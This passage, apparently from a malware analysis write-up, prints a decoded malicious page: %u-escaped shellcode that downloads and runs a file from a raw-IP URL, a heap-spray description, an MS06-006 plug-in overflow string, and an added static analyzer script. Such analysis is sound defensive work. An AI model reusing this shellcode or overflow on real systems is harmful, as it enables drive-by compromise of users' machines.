s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u382F%u2E39%u3334%u312E%u3639%u352E%u662F%u6C69%u2E65%u6870%u0070");
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv">
</EMBED>


In that last bit, the variable "s" starts with "AAAAAAAA". Then, the do/while loop takes the "s" variable and adds itself to itself 9,437,184 times (0x0900000). After you get 75,497,472 "A"s, it adds shellcode to the end. Redirecting the shellcode to a file and running the file command on it returns "/tmp/js1.sploit: MS-DOS executable (COM)".
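Added example, not code from the original post: a small static analyzer for the shape of that decoded script (the unescape seed, the do/while doubling loop, and the trailing %u payload). Because each pass of the loop doubles "s", the analyzer reports the number of passes and the length the loop actually reaches, and it converts %u units into the little-endian bytes they occupy in memory, the same bytes one would redirect to a file for the file command. The sample source and its placeholder %u units are constructed; the function names are mine.

```javascript
// Added example, not code from the original post: statically measure the
// decoded dropper's string-doubling loop and extract its %u-escaped bytes,
// instead of letting a browser run it. The source below is constructed to
// mirror the page's shape; the %u units after the loop are placeholders.
const SAMPLE_SRC =
  'var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");' +
  'do{s+=s;}while(s.length<0x0900000);' +
  's+=unescape("%u9090%u9090%uCCCC");';

// unescape("%u4141") yields ONE UTF-16 code unit (U+4141), stored as the two
// bytes 41 41. Convert a %uXXXX run to the bytes it occupies in memory
// (little-endian), which is what gets written to disk for `file` to inspect.
function unicodeEscapesToBytes(str) {
  const bytes = [];
  for (const m of str.matchAll(/%u([0-9a-fA-F]{4})/g)) {
    const v = parseInt(m[1], 16);
    bytes.push(v & 0xff, v >> 8);
  }
  return bytes;
}

// Simulate do{s+=s;}while(s.length<threshold) on lengths only: each pass
// doubles s, so the loop ends after ceil(log2(threshold/seed)) passes.
function sprayGrowth(seedLen, threshold) {
  if (seedLen <= 0) throw new RangeError("seed length must be positive");
  let len = seedLen, iterations = 0;
  do { len *= 2; iterations++; } while (len < threshold);
  return { iterations, finalLength: len, finalBytes: len * 2 };
}

// Pull the seed literal, loop bound and trailing payload out of source text
// shaped like the decoded page and report what the loop would build.
function analyzeSpray(src) {
  const seed = /var\s+s\s*=\s*unescape\("([^"]*)"\)/.exec(src);
  const loop = /do\{s\+=s;\}while\(s\.length<(0x[0-9a-fA-F]+|\d+)\);/.exec(src);
  const tail = /s\+=unescape\("([^"]*)"\)/.exec(src);
  if (!seed || !loop) return null;
  const seedLen = (seed[1].match(/%u[0-9a-fA-F]{4}/g) || []).length;
  if (seedLen === 0) return null;
  const growth = sprayGrowth(seedLen, Number(loop[1]));
  return {
    seedLen,
    threshold: Number(loop[1]),
    ...growth,
    payload: tail ? unicodeEscapesToBytes(tail[1]) : [],
  };
}
```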

The final part of the decoded page might look familiar... if not, check out Windows Media Player Plug-in for Non-Microsoft Browsers Code Execution (MS06-006) - Exploit II.